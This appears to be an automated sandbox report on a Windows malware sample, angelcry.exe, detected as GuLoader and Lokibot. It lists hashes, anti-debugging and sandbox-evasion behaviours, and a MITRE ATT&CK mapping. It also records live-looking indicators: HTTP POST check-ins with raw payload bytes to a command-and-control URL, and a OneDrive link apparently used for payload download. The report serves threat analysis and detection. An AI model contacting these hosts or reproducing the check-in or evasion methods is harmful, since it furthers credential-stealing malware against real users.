Analysis Report angelcry.exe

Overview

General Information

Sample Name: angelcry.exe
Analysis ID: 288125
MD5: 79251e38708be7ed93e899d7ed1ee1ec
SHA1: c8cdd7b5938744f1a73113dc1e3dc0c69423f811
SHA256: 3daad337166e027cb177e98f58fc121e0fd6526b0924f4d8e2de00139dee8933
Tags: exe

Detection

Detected families: GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Yara detected Lokibot
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Internet Provider seen in connection with other malware
PE file contains strange resources
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • angelcry.exe (PID: 6772 cmdline: 'C:\Users\user\Desktop\angelcry.exe' MD5: 79251E38708BE7ED93E899D7ED1EE1EC)
    • angelcry.exe (PID: 6824 cmdline: 'C:\Users\user\Desktop\angelcry.exe' MD5: 79251E38708BE7ED93E899D7ED1EE1EC)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.233182681.0000000000560000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: angelcry.exe PID: 6824 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: angelcry.exe PID: 6824 | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security |
Process Memory Space: angelcry.exe PID: 6824 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: hotelavlokan.com | Virustotal: Detection: 10%
Source: http://hotelavlokan.com/ | Virustotal: Detection: 10%
Source: http://hotelavlokan.com/angel/PL341/index.php | Virustotal: Detection: 6%

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029467 ET TROJAN Win32/AZORult V3.3 Client Checkin M14 192.168.2.6:49723 -> 104.28.25.76:80
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected:
  POST /angel/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: hotelavlokan.com
  Content-Length: 111
  Cache-Control: no-cache
  Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9c 26 66 9d 26 66 9f 26 66 9c 26 66 97 47 16 8b 30 62 8b 31 11 8b 30 60 ed 26 66 9c 45 70 9d 30 11 8b 30 61 ed
  Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&f&f&f&fG0b10`&fEp00a
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
Source: unknown | HTTP traffic detected:
  POST /angel/PL341/index.php HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  Host: hotelavlokan.com
  Content-Length: 111
  Cache-Control: no-cache
  Data Raw: 00 00 00 46 70 9d 3b 70 9d 35 14 8b 30 63 ea 26 66 9b 45 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 26 66 9c 26 66 9d 26 66 9f 26 66 9c 26 66 97 47 16 8b 30 62 8b 31 11 8b 30 60 ed 26 66 9c 45 70 9d 30 11 8b 30 61 ed
  Data Ascii: Fp;p50c&fEpGp:p7p2p7p:p3p410b&f&f&f&f&f&f&g&f&f&f&f&fG0b10`&fEp00a
Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmp | String found in binary or memory: http://crl.microsof/Vo
Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crGW
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: http://hotelavlokan.com/
Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmp | String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.php
Source: angelcry.exe, 00000001.00000003.233068138.000000001E1A0000.00000004.00000001.sdmp | String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpA
Source: angelcry.exe, 00000001.00000002.233338537.00000000008F0000.00000004.00000020.sdmp | String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpP=
Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmp | String found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpto
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: http://hotelavlokan.com/user
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: http://microsoft.co
Source: angelcry.exe, 00000001.00000002.233408237.000000000097D000.00000004.00000020.sdmp | String found in binary or memory: http://mscrl.mic1V
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmp | String found in binary or memory: https://hqdfga.bl.filem/angel/PL341/index.php
Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmp | String found in binary or memory: https://hqdfga.bl.files.1drv.com/
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp, angelcry.exe, 00000001.00000002.233371911.000000000093A000.00000004.00000020.sdmp | String found in binary or memory: https://hqdfga.bl.files.1drv.com/y4m70OQ2Pm11Rsp3_xQ9B2xjRFpfNdr164nvMKkUrZHHUFY5EBAPqZk3cjIqqJ6DjxF
Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp, angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21167&authkey=AM44Jd3
Source: angelcry.exe, 00000001.00000002.233387966.0000000000956000.00000004.00000020.sdmp | String found in binary or memory: https://www.digicert.com/CPS0

System Summary:

Potential malicious icon found
Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00561A41 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056121F RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563A3C NtQueryInformationProcess
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005636DA NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00561A55 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563A42 NtQueryInformationProcess
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00560267 NtSetInformationThread
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563C61 NtQueryInformationProcess
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563B3D NtQueryInformationProcess
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056123A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00561A3A NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005611E7 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563AE9 NtQueryInformationProcess
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563A9C NtQueryInformationProcess
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00561A8E NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005605B7 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005602A2 NtSetInformationThread
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005622DC
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00562E66
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563B3D
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056123A
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056292B
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005629DB
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563AE9
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563A9C
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00561A8E
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056298D
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005633B0
Source: angelcry.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: angelcry.exe, 00000000.00000002.210622631.000000000040A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVaagnskabeloner9.exe vs angelcry.exe
Source: angelcry.exe, 00000000.00000002.210825117.0000000002080000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs angelcry.exe
Source: angelcry.exe, 00000001.00000002.236632531.000000001DD90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs angelcry.exe
Source: angelcry.exe, 00000001.00000002.236644678.000000001DEE0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs angelcry.exe
Source: angelcry.exe, 00000001.00000000.209715398.000000000040A000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameVaagnskabeloner9.exe vs angelcry.exe
Source: angelcry.exe | Binary or memory string: OriginalFilenameVaagnskabeloner9.exe vs angelcry.exe
Source: C:\Users\user\Desktop\angelcry.exe | Section loaded: crtdll.dll
Source: classification engine | Classification label: mal100.rans.troj.evad.winEXE@3/0@3/1
Source: C:\Users\user\Desktop\angelcry.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5F-9414907A-7A741079-23129DC7-5C2F3D4C
Source: angelcry.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\angelcry.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\angelcry.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\angelcry.exe | File read: C:\Windows\System32\drivers\etc\hosts (6 occurrences)
Source: unknown | Process created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe' (2 occurrences)
Source: C:\Users\user\Desktop\angelcry.exe | Process created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe'

Data Obfuscation:

Yara detected GuLoader
Source: Yara match | File source: 00000001.00000002.233182681.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY
Yara detected VB6 Downloader Generic
Source: Yara match | File source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 0_2_004034BC push ss; ret 0_2_004034BD
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 0_2_00402918 push ds; ret 0_2_00402929
Source: C:\Users\user\Desktop\angelcry.exe | Process information set: NOOPENFILEERRORBOX (13 occurrences)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563120
Tries to detect Any.run
Source: C:\Users\user\Desktop\angelcry.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe (2 occurrences)
Source: C:\Users\user\Desktop\angelcry.exe | File opened: C:\Program Files\qga\qga.exe (2 occurrences)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: angelcry.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563A3C rdtsc
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: angelcry.exe, 00000001.00000002.233343629.00000000008F7000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWHD
Source: angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
Source: angelcry.exe, 00000001.00000002.233371911.000000000093A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAWthernet0-QoS Packet Scheduler-0000
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
Source: angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: vmicvss
Source: angelcry.exe, 00000001.00000002.233371911.000000000093A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
Source: angelcry.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Data Exchange Service
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Heartbeat Service
Source: angelcry.exe, 00000000.00000002.216513262.00000000047DA000.00000004.00000001.sdmp, angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Service Interface
Source: angelcry.exe, 00000001.00000002.233438403.00000000024DA000.00000004.00000001.sdmp | Binary or memory string: vmicheartbeat

Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00560267 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00562F10,?,0056317F
Hides threads from debuggers
Source: C:\Users\user\Desktop\angelcry.exe | Thread information set: HideFromDebugger (3 occurrences)
Source: C:\Users\user\Desktop\angelcry.exe | Process queried: DebugPort (2 occurrences)
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00563A3C rdtsc
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00561D51 InternetOpenA,LdrInitializeThunk,InternetOpenUrlA
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056111A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056114E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00562C00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005633FC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_005618E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00562EE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_00560CAC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056121F RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Code function: 1_2_0056123A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory
Source: C:\Users\user\Desktop\angelcry.exe | Process created: C:\Users\user\Desktop\angelcry.exe 'C:\Users\user\Desktop\angelcry.exe'
Source: C:\Users\user\Desktop\angelcry.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Lokibot
Source: Yara match | File source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY

Remote Access Functionality:

Yara detected Lokibot
Source: Yara match | File source: Process Memory Space: angelcry.exe PID: 6824, type: MEMORY

MITRE ATT&CK Matrix

Techniques are listed per tactic column; numbers in square brackets are the count badges attached to the technique cells in the original matrix.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job; At (Linux); At (Windows)
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac)
Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Logon Script (Mac)
Defense Evasion: Virtualization/Sandbox Evasion [21]; Process Injection [11]; DLL Side-Loading [1]; Obfuscated Files or Information [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
Discovery: Security Software Discovery [521]; Virtualization/Sandbox Evasion [21]; System Information Discovery [12]; Remote System Discovery [1]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer
Command and Control: Encrypted Channel [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Protocol Impersonation
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud
Impact: Modify System Partition; Device Lockout; Delete Device Data

Behavior Graph

(Behavior graph image not included in this extraction.)
